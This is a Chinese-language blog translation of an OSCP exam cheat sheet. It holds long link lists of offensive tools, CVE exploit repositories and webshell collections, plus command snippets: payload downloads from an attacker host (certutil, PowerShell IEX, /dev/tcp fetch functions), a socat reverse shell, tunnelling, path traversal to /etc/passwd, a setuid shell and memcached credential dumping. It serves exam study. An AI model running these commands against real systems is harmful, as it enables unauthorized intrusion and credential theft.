国外某进攻性安全证书-备忘录-2023.3.11版本

笔记说明:

该笔记是国外进攻性爱好者 0xsyr0 在 github 上记录的备忘录,我整体翻译了注释的内容,并根据个人学习情况,增加或删除了一部分内容,至此放置博客上留作后续复习使用,以及方便各位浏览到我博客的安全爱好者参考使用。

OffSec 认证专业认证 (OSCP) 的命令、有效负载和资源。

免责声明:推特上的一个人说得有道理。sqlmap考试中禁止使用此类自动利用工具。的自动利用功能也是如此LinPEAS。我没有跟踪与这些工具相关的当前指南。为此,我想指出,如果有人在没有仔细检查最新考试限制的情况下使用工具并导致考试失败,我不承担任何责任。参加考试前请先了解一下自己!

常用工具下载地址

姓名 网址
chisel https://github.com/jpillora/chisel
CyberChef https://gchq.github.io/CyberChef
ligolo-ng https://github.com/nicocha30/ligolo-ng
swaks https://github.com/jetmore/swaks

信息收集工具

姓名 网址
nmap https://github.com/nmap/nmap

漏洞分析工具

姓名 网址
nikto https://github.com/sullo/nikto
sparta https://github.com/SECFORCE/sparta

网络应用分析工具

姓名 网址
ffuf https://github.com/ffuf/ffuf
fpmvuln https://github.com/hannob/fpmvuln
gobuster https://github.com/OJ/gobuster
JSON 网络令牌 https://jwt.io
JWT_工具 https://github.com/ticarpi/jwt_tool
泄漏路径字典 https://github.com/ayoubfathi/leaky-paths
有效负载漏洞库 https://github.com/swisskyrepo/PayloadsAllTheThings
PHP 过滤器生成器 https://github.com/synacktiv/php_filter_chain_generator
PHPGGC https://github.com/ambionics/phpggc
spose https://github.com/aancw/spose
wfuzz https://github.com/xmendez/wfuzz
whatweb https://github.com/urbanadventurer/WhatWeb
wpscan https://github.com/wpscanteam/wpscan

数据库评估工具

姓名 网址
RedisModules-执行命令 https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
Redis 远程代码执行 https://github.com/Ridter/redis-rce
Redis 流氓服务器 https://github.com/n0b0dyCN/redis-rogue-server

密码攻击工具

姓名 网址
Crackmapexec https://github.com/byt3bl33d3r/CrackMapExec
默认设备密码清单 https://github.com/ihebski/DefaultCreds-cheat-sheet
火狐密码解密工具 https://github.com/unode/firefox_decrypt
hashcat https://hashcat.net/hashcat
hydra https://github.com/vanhauser-thc/thc-Hydra
john https://github.com/openwall/john
keepass-密码解密工具 https://github.com/CMEPW/keepass-dump-masterkey
keepwn-密码提取工具 https://github.com/Orange-Cyberdefense/KeePwn
kerbrute https://github.com/ropnop/kerbrute
lazagne https://github.com/AlessandroZ/LaZagne
mimikatz https://github.com/gentilkiwi/mimikatz
netexec https://github.com/Pennyw0rth/NetExec
ntlm.pw https://ntlm.pw
pypykatz https://github.com/skelsec/pypykatz

漏洞利用工具

姓名 网址
evil-winrm https://github.com/Hackplayers/evil-winrm
metasploit https://github.com/rapid7/metasploit-framework

内网域渗透工具

姓名 网址
ADCSKiller https://github.com/grimlockx/ADCSKiller
ADCS模板 https://github.com/GoateePFE/ADCSTemplate
AD_ Miner https://github.com/Mazars-Tech/AD_Miner
docker-bloodhound https://github.com/belane/docker-bloodhound
bloodhound https://github.com/BloodHoundAD/BloodHound
bloodhound https://github.com/ly4k/BloodHound
bloodhound.py https://github.com/dirkjanm/BloodHound.py
certify https://github.com/GhostPack/Certify
certipy https://github.com/ly4k/Certipy
enum4linux-ng https://github.com/cddmp/enum4linux-ng
内网可执行利用工具集合 https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
GTFOBins https://gtfobins.github.io
impacket https://github.com/fortra/impacket
Impacket 源码 https://github.com/ropnop/impacket_static_binaries
jaws https://github.com/411Hall/JAWS
krbrelay https://github.com/cube0x0/KrbRelay
Krbrelayup https://github.com/Dec0ne/KrbRelayUp
krbrelayx https://github.com/dirkjanm/krbrelayx
lapsdumper https://github.com/n00py/LAPSDumper
linux提权枚举工具 https://github.com/The-Z-Labs/linux-exploit-suggester
linenum https://github.com/rebootuser/LinEnum
lsassy https://github.com/Hackndo/lsassy
nanodump https://github.com/helpsystems/nanodump
passthecert https://github.com/AlmondOffSec/PassTheCert
PEASS-ng https://github.com/carlospolop/PEASS-ng
PKINIT工具 https://github.com/dirkjanm/PKINITtools
powercat https://github.com/besimorhino/powercat
powersharppack https://github.com/S3cur3Th1sSh1t/PowerSharpPack
powerup.ps1 https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
powerview.ps1 https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
PowerView.py https://github.com/aniqfakhrul/powerview.py
PPLdump https://github.com/itm4n/PPLdump
Priv2admin https://github.com/gtworek/Priv2Admin
PSPKIAaudit https://github.com/GhostPack/PSPKIAudit
pspy https://github.com/DominicBreuker/pspy
pth-toolkit https://github.com/byt3bl33d3r/pth-toolkit
pwncat https://github.com/calebstewart/pwncat
pywhisker https://github.com/ShutdownRepo/pywhisker
rubeus https://github.com/GhostPack/Rubeus
runascs https://github.com/antonioCoco/RunasCs
rusthound https://github.com/OPENCYBER-FR/RustHound
scavenger https://github.com/SpiderLabs/scavenger
sharpadws https://github.com/wh0amitz/SharpADWS
sharpcollection https://github.com/Flangvik/SharpCollection
sharpchromium https://github.com/djhohnstein/SharpChromium
sharphound https://github.com/BloodHoundAD/SharpHound
sharpview https://github.com/tevora-threat/SharpView
sherlock https://github.com/rasta-mouse/Sherlock
wadcoms https://wadcoms.github.io
watson https://github.com/rasta-mouse/Watson
wesng https://github.com/bitsadmin/wesng
whisker https://github.com/eladshamir/Whisker
Windows提权枚举工具 https://github.com/pentestmonkey/windows-privesc-check
Windows 权限提升基础知识 https://www.fuzzysecurity.com/tutorials/16.html
Windows 权限提升 https://github.com/frizb/Windows-Privilege-Escalation

漏洞利用数据库

数据库 网址
0day.today 利用数据库 https://0day.today
利用数据库 https://www.exploit-db.com
数据包风暴 https://packetstormsecurity.com
斯普洛图斯 https://sploitus.com

CVE漏洞利用工具

CVE 描述 网址
CVE-2014-6271 令人震惊的RCE https://github.com/nccgroup/shocker
CVE-2014-6271 Shellshock RCE PoC https://github.com/zalalov/CVE-2014-6271
CVE-2014-6271 Shellshocker RCE POC https://github.com/mubix/shellshocker-pocs
CVE-2016-5195 脏牛LPE https://github.com/firefart/dirtycow
CVE-2016-5195 脏牛“/proc/self/mem”竞争条件(/etc/passwd 方法)LPE https://www.exploit-db.com/exploits/40847
CVE-2016-5195 脏牛“PTRACE_POKEDATA”竞争条件(/etc/passwd 方法)LPE https://www.exploit-db.com/exploits/40839
CVE-2017-0144 永恒之蓝 (MS17-010) RCE https://github.com/d4t4s3c/Win7Blue
CVE-2017-0199 RTF 炸药 RCE https://github.com/bhdresh/CVE-2017-0199
CVE-2018-7600 Drupalgeddon 2 RCE https://github.com/g0rx/CVE-2018-7600-Drupal-RCE
CVE-2018-10933 libSSH 身份验证绕过 https://github.com/blacknbunny/CVE-2018-10933
CVE-2018-16509 Ghostscript PIL RCE https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509
CVE-2019-14287 Sudo 绕过 LPE https://github.com/n0w4n/CVE-2019-14287
CVE-2019-18634 Sudo 缓冲区溢出 LPE https://github.com/saleemrashid/sudo-cve-2019-18634
CVE-2019-5736 RunC 容器逃生 PoC https://github.com/Frichetten/CVE-2019-5736-PoC
CVE-2019-6447 ES文件浏览器打开端口任意文件读取 https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
CVE-2019-7304 dirty_sock LPE https://github.com/initstring/dirty_sock
CVE-2020-0796 SMBGhost RCE PoC https://github.com/chompie1337/SMBGhost_RCE_PoC
CVE-2020-1472 ZeroLogon PE 检查器和利用代码 https://github.com/VoidSec/CVE-2020-1472
CVE-2020-1472 ZeroLogon PE利用脚本 https://github.com/risksense/zerologon
CVE-2020-1472 ZeroLogon PE PoC https://github.com/dirkjanm/CVE-2020-1472
CVE-2020-1472 ZeroLogon PE 测试脚本 https://github.com/SecuraBV/CVE-2020-1472
CVE-2021-1675、CVE-2021-34527 PrintNightmare LPE RCE https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527
CVE-2021-1675 PrintNightmare LPE RCE(PowerShell 实施) https://github.com/calebstewart/CVE-2021-1675
CVE-2021-21972 vCenter 远程代码执行 https://github.com/horizon3ai/CVE-2021-21972
CVE-2021-22204 ExifTool 命令注入 RCE https://github.com/AssassinUKG/CVE-2021-22204
CVE-2021-22204 亚搏体育appGitLab ExifTool RCE https://github.com/CsEnox/Gitlab-Exiftool-RCE
CVE-2021-22204 GitLab ExifTool RCE(Python 实现) https://github.com/conisolabs/CVE-2021-22204-exiftool
CVE-2021-26085 Confluence 服务器 RCE https://github.com/Phuong39/CVE-2021-26085
CVE-2021-27928 MariaDB/MySQL wsrep 提供商 RCE https://github.com/Al1ex/CVE-2021-27928
CVE-2021-3129 Laravel 框架 RCE https://github.com/nth347/CVE-2021-3129_exploit
CVE-2021-3156 sudo / sudo LPE https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit
CVE-2021-3156 sudo / sudoedit LPE PoC https://github.com/blasty/CVE-2021-3156
CVE-2021-3493 OverlayFS Ubuntu 内核利用 LPE https://github.com/briskets/CVE-2021-3493
CVE-2021-3560 polkit LPE(C 实现) https://github.com/hakivvi/CVE-2021-3560
CVE-2021-3560 波尔基特LPE https://github.com/Almorabea/Polkit-exploit
CVE-2021-3560 polkit LPE PoC https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
CVE-2021-36934 蜂巢噩梦 LPE https://github.com/GossiTheDog/HiveNightmare
CVE-2021-36942 小波坦 https://github.com/topotam/PetitPotam
CVE-2021-36942 DFS强制 https://github.com/Wh04m1001/DFSCoerce
CVE-2021-4034 PwnKit Pkexec 独立漏洞利用 LPE https://github.com/ly4k/PwnKit
CVE-2021-4034 PwnKit Pkexec LPE PoC (1) https://github.com/dzonerzy/poc-cve-2021-4034
CVE-2021-4034 PwnKit Pkexec LPE PoC (2) https://github.com/arthepsy/CVE-2021-4034
CVE-2021-4034 PwnKit Pkexec LPE PoC (3) https://github.com/nikaiw/CVE-2021-4034
CVE-2021-41379 InstallerFileTakeOver LPE(0 天)(存档) https://github.com/klinix5/InstallerFileTakeOver
CVE-2021-41379 InstallerFileTakeOver LPE(0 天)(分叉) https://github.com/waltlin/CVE-2021-41379-With-Public-Exploit-Lets-You-Become-An-Admin-InstallerFileTakeOver
CVE-2021-41773、CVE-2021-42013、CVE-2020-17519 简单的 Apache 路径遍历(0 天) https://github.com/MrCl0wnLab/SimplesApachePathTraversal
CVE-2021-42278、CVE-2021-42287 sam-the-admin、sAMAccountName 欺骗/域管理员模拟 PE https://github.com/WazeHell/sam-the-admin
CVE-2021-42278 sam-the-admin、sAMAccountName 欺骗/域管理员模拟 PE(Python 实现) https://github.com/ly4k/Pachine
CVE-2021-42287、CVE-2021-42278 noPac LPE (1) https://github.com/cube0x0/noPac
CVE-2021-42287、CVE-2021-42278 noPac LPE (2) https://github.com/Ridter/noPac
CVE-2021-42321 微软Exchange服务器RCE https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398
CVE-2021-44228 Log4Shell RCE(0 天) https://github.com/kozmer/log4j-shell-poc
CVE-2021-44228 Log4Shell RCE(0 天) https://github.com/welk1n/JNDI-Injection-Exploit
CVE-2022-0847 DirtyPipe-利用 LPE https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
CVE-2022-21999 SpoolFool,Windows 打印后台处理程序 LPE https://github.com/ly4k/SpoolFool
CVE-2022-22963 Spring4Shell RCE(0 天) https://github.com/tweedge/springcore-0day-en
CVE-2022-23119、CVE-2022-23120 适用于 Linux 的趋势科技趋势科技深度安全防护系统客户端任意文件读取 https://github.com/modzero/MZ-21-02-Trendmicro
CVE-2022-24715 Icinga Web 2 经过身份验证的远程代码执行 RCE https://github.com/JacobEbben/CVE-2022-24715
CVE-2022-26134 ConfluencePwn RCE(0 天) https://github.com/redhuntlabs/ConfluencePwn
CVE-2022-31214 Firejail / Firejoin LPE https://seclists.org/oss-sec/2022/q2/188
CVE-2022-31214 Firejail / Firejoin LPE https://www.openwall.com/lists/oss-security/2022/06/08/10
CVE-2022-34918 Netfilter 内核利用 LPE https://github.com/randorisec/CVE-2022-34918-LPE-PoC
CVE-2022-46169 Cacti 身份验证绕过 RCE https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit
CVE-2023-21746 Windows NTLM EoP LocalPotato LPE https://github.com/decoder-it/LocalPotato
CVE-2023-21768 WinSock LPE POC 的 Windows 辅助功能驱动程序 https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768
CVE-2023-21817 Kerberos 解锁 LPE PoC https://gist.github.com/monoxgas/f615514fb51ebb55a7229f3cf79cf95b
CVE-2023-22809 sudoedit LPE https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
CVE-2023-23752 Joomla 未经身份验证的信息泄露 https://github.com/Acceis/exploit-CVE-2023-23752
CVE-2023-25690 Apache mod_proxy HTTP 请求走私 PoC https://github.com/dhmosfunk/CVE-2023-25690-POC
CVE-2023-28879 Ghost 中的 Shell:Ghostscript RCE PoC https://github.com/AlmondOffSec/PoCs/tree/master/Ghostscript_rce
CVE-2023-32233 Netfilter nf_tables LPE 中的释放后使用 https://github.com/Liuk3r/CVE-2023-32233
CVE-2023-32629、CVE-2023-2640 GameOverlay Ubuntu 内核利用 LPE(0 天) https://twitter.com/liadeliyahu/status/1684841527959273472?s=09
CVE-2023-36874 Windows 错误报告服务 LPE(0 天) https://github.com/Wh04m1001/CVE-2023-36874
CVE-2023-51467、CVE-2023-49070 Apache OFBiz 身份验证绕过 https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass
CVE-2023-7028 亚搏体育appGitLab帐户接管 https://github.com/V1lu0/CVE-2023-7028
CVE-2023-7028 亚搏体育appGitLab帐户接管 https://github.com/Vozec/CVE-2023-7028
不适用 dompdf RCE(0 天) https://github.com/positive-security/dompdf-rce
不适用 dompdf XSS 到 RCE(0 天) https://positive.security/blog/dompdf-rce
不适用 存储服务LPE https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc
不适用 ADCS强制马铃薯 https://github.com/decoder-it/ADCSCoercePotato
不适用 强制马铃薯LPE https://github.com/Prepouce/CoercedPotato
不适用 DCOM马铃薯LPE https://github.com/zcgonvh/DCOMPotato
不适用 通用马铃薯 LPE https://github.com/micahvandeusen/GenericPotato
不适用 神马铃薯LPE https://github.com/BeichenDream/GodPotato
不适用 多汁马铃薯 LPE https://github.com/ohpe/juicy-potato
不适用 马铃薯汁NG LPE https://github.com/antonioCoco/JuicyPotatoNG
不适用 多马铃薯 LPE https://github.com/S3cur3Th1sSh1t/MultiPotato
不适用 远程Potato0 PE https://github.com/antonioCoco/RemotePotato0
不适用 RoguePotato LPE https://github.com/antonioCoco/RoguePotato
不适用 烂土豆NG LPE https://github.com/breenmachine/RottenPotatoNG
不适用 SharpEfsPotato LPE https://github.com/bugch3ck/SharpEfsPotato
不适用 甘薯液化石油气 https://github.com/CCob/SweetPotato
不适用 甘薯液化石油气 https://github.com/uknowsec/SweetPotato
不适用 S4U番茄LPE https://github.com/wh0amitz/S4UTomato
不适用 PrintSpoofer LPE (1) https://github.com/dievus/printspoofer
不适用 PrintSpoofer LPE (2) https://github.com/itm4n/PrintSpoofer
不适用 令人震惊的集装箱逃生 https://github.com/gabrtv/shocker
不适用 系统噩梦PE https://github.com/GossiTheDog/SystemNightmare
不适用 无过滤器LPE https://github.com/deepinstinct/NoFilter
不适用 离线SAM LPE https://github.com/gtworek/PSBits/tree/master/OfflineSAM
不适用 OfflineAddAdmin2 LPE https://github.com/gtworek/PSBits/tree/master/OfflineSAM/OfflineAddAdmin2
不适用 内核集线器 https://github.com/Ascotbe/Kernelhub
不适用 Windows 漏洞 https://github.com/SecWiki/windows-kernel-exploits
不适用 预编译的 Windows 漏洞 https://github.com/abachy17/WindowsExploits

有效载荷大全

姓名 网址
Payload Box https://github.com/payloadbox
有效负载大全 https://github.com/swisskyrepo/PayloadsAllTheThings
phpgcc https://github.com/ambionics/phpggc
PHP 反向 Shell https://github.com/ivan-sincek/php-reverse-shell
webshell https://github.com/tennc/webshell
web-shells https://github.com/TheBinitGhimire/Web-Shells

爆破字典表或生成工具

姓名 网址
bopscrk https://github.com/R3nt0n/bopscrk
cewl https://github.com/digininja/cewl
cook https://github.com/giteshnxtlvl/cook
cupp https://github.com/Mebus/cupp
Kerberos 用户名枚举 https://github.com/attackdebris/kerberos_enum_userlists
SecLists https://github.com/danielmiessler/SecLists
username-anarchy https://github.com/urbanadventurer/username-anarchy

社交媒体资料集合

姓名 网址
OSCP 指南 01/12 – 我的考试经历 https://www.youtube.com/watch?v=9mrf-WyzkpE&list=PLJnLaWkc9xRgOyupMhNiVFfgvxseWDH5x
HTB文章集合 https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
黑客技巧 https://book.hacktricks.xyz/
黑客文章 https://www.hackingarticles.in/
IppSec (YouTube) https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA
IppSec.rocks https://ippsec.rocks/?#
0xdf https://0xdf.gitlab.io/

考试命令清单大全

基本命令

Curl 工具

1
2
3
4
5
6
7
8
9
10
11
12
13
curl -v http://<DOMAIN>                                                        // verbose output

curl -X POST http://<DOMAIN>                                                   // use POST method

curl -X PUT http://<DOMAIN>                                                    // use PUT method

curl --path-as-is http://<DOMAIN>/../../../../../../etc/passwd                 // use --path-as-is to handle /../ or /./ in the given URL

curl --proxy http://127.0.0.1:8080                                             // use proxy

curl -F myFile=@<FILE> http://<RHOST>                                          // file upload

curl${IFS}<LHOST>/<FILE>                                                       // Internal Field Separator (IFS) example

chisel 工具

反向代理
1
2
./chisel server -p 9002 -reverse -v
./chisel client <LHOST>:9002 R:3000:127.0.0.1:3000
SOCKS5 / 代理链配置
1
2
./chisel server -p 9002 -reverse -v
./chisel client <LHOST>:9002 R:socks

文件传输方法

证书工具下载文件
1
certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE>
NETCAT 传递文件
1
2
nc -lnvp <LPORT> < <FILE>
nc <RHOST> <RPORT> > <FILE>
IMPACKET-SMBSERVER 传递文件
1
2
3
sudo impacket-smbserver <SHARE> ./
sudo impacket-smbserver <SHARE> . -smb2support
copy * \\<LHOST>\<SHARE>
POWERSHELL 传递文件
1
2
3
4
5
iwr <LHOST>/<FILE> -o <FILE>

IEX(IWR http://<LHOST>/<FILE>) -UseBasicParsing

powershell -command Invoke-WebRequest -Uri http://<LHOST>:<LPORT>/<FILE> -Outfile C:\\temp\\<FILE>
仅 BASH 下的文件传递命令
WGET 函数版本的文件传输使用

直接粘贴到SHELL上面:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
function __wget() {
    : ${DEBUG:=0}
    local URL=$1
    local tag="Connection: close"
    local mark=0

    if [ -z "${URL}" ]; then
        printf "Usage: %s \"URL\" [e.g.: %s http://www.google.com/]" \
               "${FUNCNAME[0]}" "${FUNCNAME[0]}"
        return 1;
    fi
    read proto server path <<<$(echo ${URL//// })
    DOC=/${path// //}
    HOST=${server//:*}
    PORT=${server//*:}
    [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
    [[ $DEBUG -eq 1 ]] && echo "HOST=$HOST"
    [[ $DEBUG -eq 1 ]] && echo "PORT=$PORT"
    [[ $DEBUG -eq 1 ]] && echo "DOC =$DOC"

    exec 3<>/dev/tcp/${HOST}/$PORT
    echo -en "GET ${DOC} HTTP/1.1\r\nHost: ${HOST}\r\n${tag}\r\n\r\n" >&3
    while read line; do
        [[ $mark -eq 1 ]] && echo $line
        if [[ "${line}" =~ "${tag}" ]]; then
            mark=1
        fi
    done <&3
    exec 3>&-
}

使用上面自定义的函数下载文件:

1
__wget http://<LHOST>/<FILE>
CURL 函数版本的文件传输使用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

使用上面自定义的函数进行文件下载:

1
__curl http://<LHOST>/<FILE> > <OUTPUT_FILE>

使用FTP协议进行文件传输

1
2
ftp <RHOST>
wget -r ftp://anonymous:anonymous@<RHOST>

Kerberos 协议 ( KDC密钥分发中心 )

1
sudo apt-get install krb5-kdc

获取目标域账号票据并导入到本地使用:

1
2
3
impacket-getTGT <DOMAIN>/<USERNAME>:'<PASSWORD>'
export KRB5CCNAME=<FILE>.ccache # (导入票据)
export KRB5CCNAME='realpath <FILE>.ccache'

kerberos协议默认命令使用:

1
2
3
4
5
6
7
8
9
10
11
/etc/krb5.conf                   // kerberos配置文件位置
kinit <USERNAME>                 // 创建票证请求
klist                            // 显示可用的kerberos门票
kdestroy                         // 删除缓存的kerberos票证
.k5login                         // 驻留用于登录的kerberos主体(位于主目录中)
krb5.keytab                      // 一个或多个主体的“密钥表”文件
kadmin                           // kerberos管理控制台
add_principal <EMAIL>            // 将新用户添加到keytab文件
ksu                              // 使用kerberos身份验证执行命令
klist -k /etc/krb5.keytab        // 列出 keytab 文件
kadmin -p kadmin/<EMAIL> -k -t /etc/krb5.keytab    // 启用对keytab文件的编辑

ligolo-ng | 像VPN一样的隧道代理工具

工具地址: https://github.com/nicocha30/ligolo-ng

下载代理服务端和客户端程序
1
2
3
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz
准备隧道接口
1
sudo ip tuntap add user $(whoami) mode tun ligolo
1
sudo ip link set ligolo up
在攻击者机器上设置代理
1
./proxy -laddr <LHOST>:443 -selfcert
在目标机器上安装代理
1
./agent -connect <LHOST>:443 -ignore-cert
靶机会话操作

查看获取到的会话信息并选择:

1
ligolo-ng » session

查看目标靶机的网络配置情况:

1
[Agent : user@target] » ifconfig

在攻击机上添加靶机路由地址:

1
sudo ip r add 172.16.1.0/24 dev ligolo

启动路由代理:

1
[Agent : user@target] » start

Linux

启动某个用户的BASH操作环境
1
doas -u <USERNAME> /bin/sh
设置环境变量
1
export PATH=`pwd`:$PATH
编译某个EXP工具源码为EXE的可执行文件
1
2
3
4
5
gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit

i686-w64-mingw32-gcc -o main32.exe main.c

x86_64-w64-mingw32-gcc -o main64.exe main.c
查看文件或目录访问控制列表
1
getfacl <LOCAL_DIRECTORY>
对文件字符串进行固定格式的转换和BASE64编码
1
2
3
4
5
echo "<COMMAND>" | iconv -t UTF-16LE | base64 -w 0

echo "<COMMAND>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0

iconv -f ASCII -t UTF-16LE <FILE>.txt | base64 | tr -d "\n"
VI 命令工具提权
1
:w !sudo tee %    # 使用提升的权限保存文件而不退出
WINDOWS 命令格式化
1
echo "<COMMAND>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0

Microsoft Windows

查看本地文件
1
2
3
4
5
dir /a
dir /a:d
dir /a:h
dir flag* /s /p
dir /s /b *.log

PHP一键生成WEB服务器

1
sudo php -S 127.0.0.1:80

PING 测试目标连通率

1
2
ping -c 1 <RHOST>
ping -n 1 <RHOST>

Python一键启动WEB服务器

1
2
sudo python -m SimpleHTTPServer 80
sudo python3 -m http.server 80

使用xfreerdp和rdesktop登录win主机

1
2
3
4
5
6
7
xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> /dynamic-resolution +clipboard

xfreerdp /v:<RHOST> /u:<USERNAME> /d:<DOMAIN> /pth:'<HASH>' /dynamic-resolution +clipboard

rdesktop <RHOST>

xfreerdp /v:<RHOST> /dynamic-resolution +clipboard /tls-seclevel:0 -sec-nla

showmount 命令使用

1
2
3
4
5
6
# 查询远程NFS服务器 <RHOST> 上共享的目录列表
/usr/sbin/showmount -e <RHOST>
# 以管理员身份查询远程NFS服务器 <RHOST> 上共享的目录列表
sudo showmount -e <RHOST>
# 更改文件所有权并添加+S参数
chown root:root sid-shell; chmod +s sid-shell

目标靶机存在磁盘SMB共享服务 - 挂载远程文件系统

1
2
3
4
# 挂载CIFS(Common Internet File System,一种基于SMB协议的网络文件共享协议)类型的远程文件系统。
mount.cifs //<RHOST>/<SHARE> /mnt/remote
# 挂载虚拟机镜像文件中的某个目录作为本地挂载点的,通常用在虚拟化环境中。
guestmount --add '/<MOUNTPOINT>/<DIRECTORY/FILE>' --inspector --ro /mnt/<MOUNT> -v

SMBCLIENT 工具使用

1
2
3
4
5
6
7
8
9
10
smbclient -L \\<RHOST>\ -N
smbclient -L //<RHOST>/ -N
smbclient -L ////<RHOST>/ -N
smbclient -L //<RHOST>// -U <USERNAME>%<PASSWORD>
smbclient -U "<USERNAME>" -L \\\\<RHOST>\\
smbclient //<RHOST>/<SHARE> -U <USERNAME>
smbclient //<RHOST>/SYSVOL -U <USERNAME>%<PASSWORD>
smbclient "\\\\<RHOST>\<SHARE>"
smbclient \\\\<RHOST>\\<SHARE> -U '<USERNAME>' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
smbclient --no-pass //<RHOST>/<SHARE>
在FTP服务器上一次下载多个文件
1
2
3
4
mask""
recurse ON
prompt OFF
mget *

Socat 端口转发工具

1
2
# 将本地端口流量转发到远程主机的目标端口上
socat TCP-LISTEN:<LPORT>,fork TCP:<RHOST>:<RPORT>
1
2
3
# 获取靶机上面反弹的交互shell
socat file:`tty`,raw,echo=0 tcp-listen:<LPORT>
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<LHOST>:<LPORT>
1
2
3
# 监听本地端口地址,并将本地监听的流量转发到目标远程主机的目标端口上或本地端口上
socat tcp-listen:5986,reuseaddr,fork tcp:<RHOST>:9002
socat tcp-listen:9002,reuseaddr,fork tcp:192.168.122.228:5968 &

SSH端口转发操作

1
2
3
4
5
6
7
8
9
ssh user@<RHOST> -oKexAlgorithms=+diffie-hellman-group1-sha1

ssh -R 8080:<LHOST>:80 <RHOST>
ssh -L 8000:127.0.0.1:8000 <USERNAME>@<RHOST>
ssh -N -L 1234:127.0.0.1:1234 <USERNAME>@<RHOST>

ssh -L 80:<LHOST>:80 <RHOST>
ssh -L 127.0.0.1:80:<LHOST>:80 <RHOST>
ssh -L 80:localhost:80 <RHOST>

时间和日期

获取服务器时间
1
sudo nmap -sU -p 123 --script ntp-info <RHOST>
停止 VIRTUALBOX-GUEST-UTILS 以停止同步时间
1
sudo /etc/init.d/virtualbox-guest-utils stop
停止 SYSTEMD-TIMESYNCD 以手动同步时间
1
sudo systemctl stop systemd-timesyncd
禁用自动同步
1
sudo systemctl disable --now chronyd
设置日期和时间的选项
1
2
3
4
5
6
7
8
9
10
11
12
sudo net time -c <RHOST>
sudo net time set -S <RHOST>
sudo net time \\<RHOST> /set /y
sudo ntpdate <RHOST>
sudo ntpdate -s <RHOST>
sudo ntpdate -b -u <RHOST>
sudo timedatectl set-timezone UTC
sudo timedatectl list-timezones
sudo timedatectl set-timezone '<COUNTRY>/<CITY>'
sudo timedatectl set-time 15:58:30
sudo timedatectl set-time '2015-11-20 16:14:50'
sudo timedatectl set-local-rtc 1
与服务器保持同步
1
while [ 1 ]; do sudo ntpdate <RHOST>;done

快捷命令

1
2
3
4
5
6
7
ctrl b + w    # 显示窗口
ctrl + "      # 水平拆分窗口
ctrl + %      # 垂直拆分窗口
ctrl + ,      # 重命名窗口
ctrl + {      # 翻转窗口
ctrl + }      # 翻转窗口
ctrl + spacebar    # 开关窗格布局

复制和粘贴

1
2
3
4
5
:setw -g mode-keys vi
ctrl b + [
space
enter
ctrl b + ]

搜索

1
2
3
4
ctrl b + [    # 输入复制内容
ctrl + /      # 在vi模式的复制模式下输入搜索
n             # 搜索下一个
shift + n     # 反向搜索

记录

1
2
ctrl b
shift + P    # start / stop

保存输出

1
2
3
4
ctrl b + :
capture-pane -S -
ctrl b + :
save-buffer <FILE>.txt

升级SHELL

1
2
3
4
5
6
7
8
9
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl + z
stty raw -echo
fg
Enter
Enter
export XTERM=xterm

或者:

1
2
script -q /dev/null -c bash
/usr/bin/script -qc /bin/bash /dev/null

切换shell环境为完整的shell环境

1
stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

修复隧道shell环境

1
env reset

或者

1
stty onlcr

VirtualBox - 完善SHELL环境

1
sudo pkill VBoxClient && VBoxClient --clipboard

virtualenv - 激活虚拟shell环境

1
2
3
sudo apt-get install virtualenv
virtualenv -p python2.7 venv
. venv/bin/activate
1
2
3
python.exe -m pip install virtualenv
python.exe -m virtualenv venv
venv\Scripts\activate

信息收集

内存缓存工具

工具地址:https://github.com/pd4d10/memcached-cli

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
memcrashed / 11211/UDP

npm install -g memcached-cli
memcached-cli <USERNAME>:<PASSWORD>@<RHOST>:11211
echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 127.0.0.1 11211

STAT pid 21357
STAT uptime 41557034
STAT time 1519734962

sudo nmap <RHOST> -p 11211 -sU -sS --script memcached-info

stats items
stats cachedump 1 0
get link
get file
get user
get passwd
get account
get username
get password

